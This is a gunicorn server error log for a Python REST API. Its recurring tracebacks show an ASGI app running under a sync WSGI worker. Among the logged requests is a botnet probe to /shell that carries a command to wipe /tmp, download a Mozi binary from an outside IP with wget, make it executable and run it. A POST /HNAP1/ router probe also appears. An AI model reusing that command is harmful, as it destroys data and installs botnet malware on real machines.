[2022-05-17 23:01:32 +0000] [23678] [DEBUG] Current configuration:
  config: gunicorn_conf.py
  wsgi_app: None
  bind: ['unix:/home/ar/python/nlpguide_rest_api/gunicorn.sock']
  backlog: 2048
  workers: 2
  worker_class: sync
  threads: 1
  worker_connections: 1000
  max_requests: 0
  max_requests_jitter: 0
  timeout: 30
  graceful_timeout: 30
  keepalive: 2
  limit_request_line: 4094
  limit_request_fields: 100
  limit_request_field_size: 8190
  reload: False
  reload_engine: auto
  reload_extra_files: []
  spew: False
  check_config: False
  print_config: False
  preload_app: False
  sendfile: None
  reuse_port: False
  chdir: /home/ar/python/nlpguide_rest_api
  daemon: False
  raw_env: []
  pidfile: None
  worker_tmp_dir: None
  user: 1000
  group: 33
  umask: 0
  initgroups: False
  tmp_upload_dir: None
  secure_scheme_headers: {'X-FORWARDED-PROTOCOL': 'ssl', 'X-FORWARDED-PROTO': 'https', 'X-FORWARDED-SSL': 'on'}
  forwarded_allow_ips: ['127.0.0.1']
  accesslog: /home/ar/python/nlpguide_rest_api/access_log
  disable_redirect_access_to_syslog: False
  access_log_format: %(h)s %(l)s %(u)s %(t)s "%(r)s" %(s)s %(b)s "%(f)s" "%(a)s"
  errorlog: /home/ar/python/nlpguide_rest_api/error_log
  loglevel: debug
  capture_output: False
  logger_class: gunicorn.glogging.Logger
  logconfig: None
  logconfig_dict: {}
  syslog_addr: udp://localhost:514
  syslog: False
  syslog_prefix: None
  syslog_facility: user
  enable_stdio_inheritance: False
  statsd_host: None
  dogstatsd_tags: 
  statsd_prefix: 
  proc_name: None
  default_proc_name: main:app
  pythonpath: None
  paste: None
  on_starting: <function OnStarting.on_starting at 0x7f70cdae8280>
  on_reload: <function OnReload.on_reload at 0x7f70cdae83a0>
  when_ready: <function WhenReady.when_ready at 0x7f70cdae84c0>
  pre_fork: <function Prefork.pre_fork at 0x7f70cdae85e0>
  post_fork: <function Postfork.post_fork at 0x7f70cdae8700>
  post_worker_init: <function PostWorkerInit.post_worker_init at 0x7f70cdae8820>
  worker_int: <function WorkerInt.worker_int at 0x7f70cdae8940>
  worker_abort: <function WorkerAbort.worker_abort at 0x7f70cdae8a60>
  pre_exec: <function PreExec.pre_exec at 0x7f70cdae8b80>
  pre_request: <function PreRequest.pre_request at 0x7f70cdae8ca0>
  post_request: <function PostRequest.post_request at 0x7f70cdae8d30>
  child_exit: <function ChildExit.child_exit at 0x7f70cdae8e50>
  worker_exit: <function WorkerExit.worker_exit at 0x7f70cdae8f70>
  nworkers_changed: <function NumWorkersChanged.nworkers_changed at 0x7f70cdafe0d0>
  on_exit: <function OnExit.on_exit at 0x7f70cdafe1f0>
  proxy_protocol: False
  proxy_allow_ips: ['127.0.0.1']
  keyfile: None
  certfile: None
  ssl_version: 2
  cert_reqs: 0
  ca_certs: None
  suppress_ragged_eofs: True
  do_handshake_on_connect: False
  ciphers: None
  raw_paste_global_conf: []
  strip_header_spaces: False
[2022-05-17 23:01:32 +0000] [23678] [INFO] Starting gunicorn 20.1.0
[2022-05-17 23:01:32 +0000] [23678] [DEBUG] Arbiter booted
[2022-05-17 23:01:32 +0000] [23678] [INFO] Listening at: unix:/home/ar/python/nlpguide_rest_api/gunicorn.sock (23678)
[2022-05-17 23:01:32 +0000] [23678] [INFO] Using worker: sync
[2022-05-17 23:01:32 +0000] [23680] [INFO] Booting worker with pid: 23680
[2022-05-17 23:01:32 +0000] [23681] [INFO] Booting worker with pid: 23681
[2022-05-17 23:01:33 +0000] [23678] [DEBUG] 2 workers
[2022-05-17 23:35:36 +0000] [23678] [INFO] Handling signal: term
[2022-05-17 23:35:36 +0000] [23680] [INFO] Worker exiting (pid: 23680)
[2022-05-17 23:35:36 +0000] [23681] [INFO] Worker exiting (pid: 23681)
[2022-05-17 23:35:36 +0000] [23678] [WARNING] Worker with pid 23680 was terminated due to signal 15
[2022-05-17 23:35:36 +0000] [23678] [WARNING] Worker with pid 23681 was terminated due to signal 15
[2022-05-17 23:35:36 +0000] [23678] [INFO] Shutting down: Master
[2022-05-17 23:35:36 +0000] [25726] [DEBUG] Current configuration:
  config: gunicorn_conf.py
  wsgi_app: None
  bind: ['unix:/home/ar/python/nlpguide_rest_api/gunicorn.sock']
  backlog: 2048
  workers: 2
  worker_class: sync
  threads: 1
  worker_connections: 1000
  max_requests: 0
  max_requests_jitter: 0
  timeout: 30
  graceful_timeout: 30
  keepalive: 2
  limit_request_line: 4094
  limit_request_fields: 100
  limit_request_field_size: 8190
  reload: False
  reload_engine: auto
  reload_extra_files: []
  spew: False
  check_config: False
  print_config: False
  preload_app: False
  sendfile: None
  reuse_port: False
  chdir: /home/ar/python/nlpguide_rest_api
  daemon: False
  raw_env: []
  pidfile: None
  worker_tmp_dir: None
  user: 1000
  group: 33
  umask: 0
  initgroups: False
  tmp_upload_dir: None
  secure_scheme_headers: {'X-FORWARDED-PROTOCOL': 'ssl', 'X-FORWARDED-PROTO': 'https', 'X-FORWARDED-SSL': 'on'}
  forwarded_allow_ips: ['127.0.0.1']
  accesslog: /home/ar/python/nlpguide_rest_api/access_log
  disable_redirect_access_to_syslog: False
  access_log_format: %(h)s %(l)s %(u)s %(t)s "%(r)s" %(s)s %(b)s "%(f)s" "%(a)s"
  errorlog: /home/ar/python/nlpguide_rest_api/error_log
  loglevel: debug
  capture_output: False
  logger_class: gunicorn.glogging.Logger
  logconfig: None
  logconfig_dict: {}
  syslog_addr: udp://localhost:514
  syslog: False
  syslog_prefix: None
  syslog_facility: user
  enable_stdio_inheritance: False
  statsd_host: None
  dogstatsd_tags: 
  statsd_prefix: 
  proc_name: None
  default_proc_name: main:app
  pythonpath: None
  paste: None
  on_starting: <function OnStarting.on_starting at 0x7f095e215280>
  on_reload: <function OnReload.on_reload at 0x7f095e2153a0>
  when_ready: <function WhenReady.when_ready at 0x7f095e2154c0>
  pre_fork: <function Prefork.pre_fork at 0x7f095e2155e0>
  post_fork: <function Postfork.post_fork at 0x7f095e215700>
  post_worker_init: <function PostWorkerInit.post_worker_init at 0x7f095e215820>
  worker_int: <function WorkerInt.worker_int at 0x7f095e215940>
  worker_abort: <function WorkerAbort.worker_abort at 0x7f095e215a60>
  pre_exec: <function PreExec.pre_exec at 0x7f095e215b80>
  pre_request: <function PreRequest.pre_request at 0x7f095e215ca0>
  post_request: <function PostRequest.post_request at 0x7f095e215d30>
  child_exit: <function ChildExit.child_exit at 0x7f095e215e50>
  worker_exit: <function WorkerExit.worker_exit at 0x7f095e215f70>
  nworkers_changed: <function NumWorkersChanged.nworkers_changed at 0x7f095e22b0d0>
  on_exit: <function OnExit.on_exit at 0x7f095e22b1f0>
  proxy_protocol: False
  proxy_allow_ips: ['127.0.0.1']
  keyfile: None
  certfile: None
  ssl_version: 2
  cert_reqs: 0
  ca_certs: None
  suppress_ragged_eofs: True
  do_handshake_on_connect: False
  ciphers: None
  raw_paste_global_conf: []
  strip_header_spaces: False
[2022-05-17 23:35:36 +0000] [25726] [INFO] Starting gunicorn 20.1.0
[2022-05-17 23:35:36 +0000] [25726] [DEBUG] Arbiter booted
[2022-05-17 23:35:36 +0000] [25726] [INFO] Listening at: unix:/home/ar/python/nlpguide_rest_api/gunicorn.sock (25726)
[2022-05-17 23:35:36 +0000] [25726] [INFO] Using worker: sync
[2022-05-17 23:35:36 +0000] [25728] [INFO] Booting worker with pid: 25728
[2022-05-17 23:35:36 +0000] [25729] [INFO] Booting worker with pid: 25729
[2022-05-17 23:35:36 +0000] [25726] [DEBUG] 2 workers
[2022-05-18 00:38:13 +0000] [25729] [DEBUG] GET /hello
[2022-05-18 00:38:13 +0000] [25729] [ERROR] Error handling request /hello
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 00:41:22 +0000] [25729] [DEBUG] GET /hello
[2022-05-18 00:41:22 +0000] [25729] [ERROR] Error handling request /hello
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 00:55:48 +0000] [25726] [INFO] Handling signal: term
[2022-05-18 00:55:48 +0000] [25728] [INFO] Worker exiting (pid: 25728)
[2022-05-18 00:55:48 +0000] [25729] [INFO] Worker exiting (pid: 25729)
[2022-05-18 00:55:48 +0000] [25726] [WARNING] Worker with pid 25729 was terminated due to signal 15
[2022-05-18 00:55:48 +0000] [25726] [WARNING] Worker with pid 25728 was terminated due to signal 15
[2022-05-18 00:55:48 +0000] [25726] [INFO] Shutting down: Master
[2022-05-18 00:55:48 +0000] [26808] [DEBUG] Current configuration:
  config: gunicorn_conf.py
  wsgi_app: None
  bind: ['unix:/home/ar/python/nlpguide_rest_api/gunicorn.sock']
  backlog: 2048
  workers: 2
  worker_class: sync
  threads: 1
  worker_connections: 1000
  max_requests: 0
  max_requests_jitter: 0
  timeout: 30
  graceful_timeout: 30
  keepalive: 2
  limit_request_line: 4094
  limit_request_fields: 100
  limit_request_field_size: 8190
  reload: False
  reload_engine: auto
  reload_extra_files: []
  spew: False
  check_config: False
  print_config: False
  preload_app: False
  sendfile: None
  reuse_port: False
  chdir: /home/ar/python/nlpguide_rest_api
  daemon: False
  raw_env: []
  pidfile: None
  worker_tmp_dir: None
  user: 1000
  group: 33
  umask: 0
  initgroups: False
  tmp_upload_dir: None
  secure_scheme_headers: {'X-FORWARDED-PROTOCOL': 'ssl', 'X-FORWARDED-PROTO': 'https', 'X-FORWARDED-SSL': 'on'}
  forwarded_allow_ips: ['127.0.0.1']
  accesslog: /home/ar/python/nlpguide_rest_api/access_log
  disable_redirect_access_to_syslog: False
  access_log_format: %(h)s %(l)s %(u)s %(t)s "%(r)s" %(s)s %(b)s "%(f)s" "%(a)s"
  errorlog: /home/ar/python/nlpguide_rest_api/error_log
  loglevel: debug
  capture_output: False
  logger_class: gunicorn.glogging.Logger
  logconfig: None
  logconfig_dict: {}
  syslog_addr: udp://localhost:514
  syslog: False
  syslog_prefix: None
  syslog_facility: user
  enable_stdio_inheritance: False
  statsd_host: None
  dogstatsd_tags: 
  statsd_prefix: 
  proc_name: None
  default_proc_name: main:app
  pythonpath: None
  paste: None
  on_starting: <function OnStarting.on_starting at 0x7f6f0ce9f280>
  on_reload: <function OnReload.on_reload at 0x7f6f0ce9f3a0>
  when_ready: <function WhenReady.when_ready at 0x7f6f0ce9f4c0>
  pre_fork: <function Prefork.pre_fork at 0x7f6f0ce9f5e0>
  post_fork: <function Postfork.post_fork at 0x7f6f0ce9f700>
  post_worker_init: <function PostWorkerInit.post_worker_init at 0x7f6f0ce9f820>
  worker_int: <function WorkerInt.worker_int at 0x7f6f0ce9f940>
  worker_abort: <function WorkerAbort.worker_abort at 0x7f6f0ce9fa60>
  pre_exec: <function PreExec.pre_exec at 0x7f6f0ce9fb80>
  pre_request: <function PreRequest.pre_request at 0x7f6f0ce9fca0>
  post_request: <function PostRequest.post_request at 0x7f6f0ce9fd30>
  child_exit: <function ChildExit.child_exit at 0x7f6f0ce9fe50>
  worker_exit: <function WorkerExit.worker_exit at 0x7f6f0ce9ff70>
  nworkers_changed: <function NumWorkersChanged.nworkers_changed at 0x7f6f0ceb50d0>
  on_exit: <function OnExit.on_exit at 0x7f6f0ceb51f0>
  proxy_protocol: False
  proxy_allow_ips: ['127.0.0.1']
  keyfile: None
  certfile: None
  ssl_version: 2
  cert_reqs: 0
  ca_certs: None
  suppress_ragged_eofs: True
  do_handshake_on_connect: False
  ciphers: None
  raw_paste_global_conf: []
  strip_header_spaces: False
[2022-05-18 00:55:48 +0000] [26808] [INFO] Starting gunicorn 20.1.0
[2022-05-18 00:55:48 +0000] [26808] [DEBUG] Arbiter booted
[2022-05-18 00:55:48 +0000] [26808] [INFO] Listening at: unix:/home/ar/python/nlpguide_rest_api/gunicorn.sock (26808)
[2022-05-18 00:55:48 +0000] [26808] [INFO] Using worker: sync
[2022-05-18 00:55:48 +0000] [26810] [INFO] Booting worker with pid: 26810
[2022-05-18 00:55:48 +0000] [26811] [INFO] Booting worker with pid: 26811
[2022-05-18 00:55:49 +0000] [26808] [DEBUG] 2 workers
[2022-05-18 00:56:34 +0000] [26810] [DEBUG] GET /hello
[2022-05-18 00:56:34 +0000] [26810] [ERROR] Error handling request /hello
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 00:56:36 +0000] [26811] [DEBUG] GET /hello
[2022-05-18 00:56:36 +0000] [26811] [ERROR] Error handling request /hello
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 00:58:58 +0000] [26811] [DEBUG] GET /
[2022-05-18 00:58:58 +0000] [26811] [ERROR] Error handling request /
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 01:37:07 +0000] [26811] [DEBUG] GET /
[2022-05-18 01:37:07 +0000] [26811] [ERROR] Error handling request /
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 01:51:11 +0000] [26811] [DEBUG] GET /
[2022-05-18 01:51:11 +0000] [26811] [ERROR] Error handling request /
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 01:58:32 +0000] [26811] [DEBUG] GET /
[2022-05-18 01:58:32 +0000] [26811] [ERROR] Error handling request /
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 04:54:00 +0000] [26811] [DEBUG] GET /
[2022-05-18 04:54:00 +0000] [26811] [ERROR] Error handling request /
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 05:35:34 +0000] [26811] [DEBUG] GET /shell
[2022-05-18 05:35:34 +0000] [26811] [ERROR] Error handling request /shell?cd+/tmp;rm+-rf+*;wget+http://59.58.116.60:56340/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 05:48:43 +0000] [26811] [DEBUG] GET /
[2022-05-18 05:48:43 +0000] [26811] [ERROR] Error handling request /
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 05:49:07 +0000] [26810] [DEBUG] GET /
[2022-05-18 05:49:07 +0000] [26810] [ERROR] Error handling request /
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 05:54:09 +0000] [26810] [DEBUG] GET /
[2022-05-18 05:54:09 +0000] [26810] [ERROR] Error handling request /
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 05:54:10 +0000] [26811] [DEBUG] POST /HNAP1/
[2022-05-18 05:54:10 +0000] [26811] [ERROR] Error handling request /HNAP1/
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 06:07:21 +0000] [26811] [DEBUG] GET /hello
[2022-05-18 06:07:21 +0000] [26811] [ERROR] Error handling request /hello
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 06:12:56 +0000] [26811] [DEBUG] GET /hello
[2022-05-18 06:12:56 +0000] [26811] [ERROR] Error handling request /hello
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 06:17:10 +0000] [26811] [DEBUG] GET /docs
[2022-05-18 06:17:10 +0000] [26811] [ERROR] Error handling request /docs
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 06:29:17 +0000] [26810] [DEBUG] GET /hello
[2022-05-18 06:29:17 +0000] [26810] [ERROR] Error handling request /hello
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 06:43:39 +0000] [26810] [DEBUG] GET /hello
[2022-05-18 06:43:39 +0000] [26810] [ERROR] Error handling request /hello
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 06:59:59 +0000] [26811] [DEBUG] GET /hello
[2022-05-18 06:59:59 +0000] [26811] [ERROR] Error handling request /hello
Traceback (most recent call last):
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 136, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/ar/python/nlpguide_rest_api/venv/lib/python3.8/site-packages/gunicorn/workers/sync.py", line 179, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
TypeError: __call__() missing 1 required positional argument: 'send'
[2022-05-18 07:01:19 +0000] [26808] [INFO] Handling signal: term
[2022-05-18 07:01:19 +0000] [26810] [INFO] Worker exiting (pid: 26810)
[2022-05-18 07:01:19 +0000] [26811] [INFO] Worker exiting (pid: 26811)
[2022-05-18 07:01:19 +0000] [26808] [WARNING] Worker with pid 26810 was terminated due to signal 15
[2022-05-18 07:01:19 +0000] [26808] [WARNING] Worker with pid 26811 was terminated due to signal 15
[2022-05-18 07:01:19 +0000] [26808] [INFO] Shutting down: Master
